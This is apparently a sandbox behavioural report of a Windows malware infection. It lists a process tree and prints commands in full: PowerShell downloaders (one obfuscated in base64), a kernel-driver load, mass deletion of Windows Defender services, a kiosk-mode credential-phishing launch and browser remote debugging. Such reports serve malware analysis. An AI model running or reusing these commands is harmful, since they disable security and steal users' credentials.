txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:672 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13EE.tmp\13EF.tmp\13F0.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1128 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\147A.tmp\148B.tmp\148C.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
PID:1732 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:696
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2068
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1604
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2108
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2244
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1752
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:736
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:836
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:1708
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:2064
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:2128
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:560
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:2344
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:776
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵PID:2072
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:2556
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:1476
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:2204
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:2124
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1136
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:852
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:264
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:1556
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2500
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:1700
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:2764
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:1796
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:2868
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:2916
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:2376
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:3060
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:2120
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:2176
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:3036
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:2468
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:2096
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2724
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:2300
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:1588
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:1924
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338710101\17e149dbfb.exe"C:\Users\Admin\AppData\Local\Temp\10338710101\17e149dbfb.exe"3⤵
- Executes dropped EXE
PID:2784 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2784 -s 364⤵
- Loads dropped DLL
PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338720101\e024e105da.exe"C:\Users\Admin\AppData\Local\Temp\10338720101\e024e105da.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\10338730101\221764ef7a.exe"C:\Users\Admin\AppData\Local\Temp\10338730101\221764ef7a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2936 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:636 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6a09758,0x7fef6a09768,0x7fef6a097785⤵PID:2172
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:25⤵PID:792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:85⤵PID:2460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1604 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:85⤵PID:2764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2124 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2392 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2400 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1336 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:25⤵PID:2200
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3384 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef46b9758,0x7fef46b9768,0x7fef46b97785⤵PID:3396
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:3532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:25⤵PID:3588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:85⤵PID:3596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:85⤵PID:3768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2632 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2640 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1668 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:25⤵PID:3580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:85⤵PID:3588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338740101\65516ed6cf.exe"C:\Users\Admin\AppData\Local\Temp\10338740101\65516ed6cf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2472 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2640
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:900 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.0.2092125203\1852918843" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {752472b1-c101-43f1-9770-d19a0e1c39d9} 900 "\\.\pipe\gecko-crash-server-pipe.900" 1284 10dc1858 gpu6⤵PID:1356
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.1.565666060\1032224838" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1ddfb3b-d810-42e2-85dd-6613e92e4851} 900 "\\.\pipe\gecko-crash-server-pipe.900" 1500 10d03258 socket6⤵PID:2160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.2.918592524\296950844" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21811 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2725b7aa-c49d-4e6c-8735-9414a8236d2e} 900 "\\.\pipe\gecko-crash-server-pipe.900" 2104 1aad9f58 tab6⤵PID:2812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.3.172276356\1174216729" -childID 2 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {584bb732-a6aa-495e-b516-aae7de8d0e29} 900 "\\.\pipe\gecko-crash-server-pipe.900" 2928 1dc06858 tab6⤵PID:2792
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.4.1267517237\1383386919" -childID 3 -isForBrowser -prefsHandle 3748 -prefMapHandle 3744 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ad0f593-883a-4b55-aa94-e285d0074abe} 900 "\\.\pipe\gecko-crash-server-pipe.900" 3760 20969058 tab6⤵PID:2720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.5.1830560616\1186977002" -childID 4 -isForBrowser -prefsHandle 3760 -prefMapHandle 3880 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {edadb329-9cc9-46bb-ab47-3dbee745acfc} 900 "\\.\pipe\gecko-crash-server-pipe.900" 3988 20f98d58 tab6⤵PID:2764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.6.181219104\1991196177" -childID 5 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ac48791-9403-4120-a419-adf536d29a3c} 900 "\\.\pipe\gecko-crash-server-pipe.900" 4084 20f99658 tab6⤵PID:2984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338750101\b43449a9e4.exe"C:\Users\Admin\AppData\Local\Temp\10338750101\b43449a9e4.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3860 -
C:\Windows\system32\cmd.execmd.exe /c 67e2ff36de8a3.vbs4⤵PID:3784
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"5⤵PID:3428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4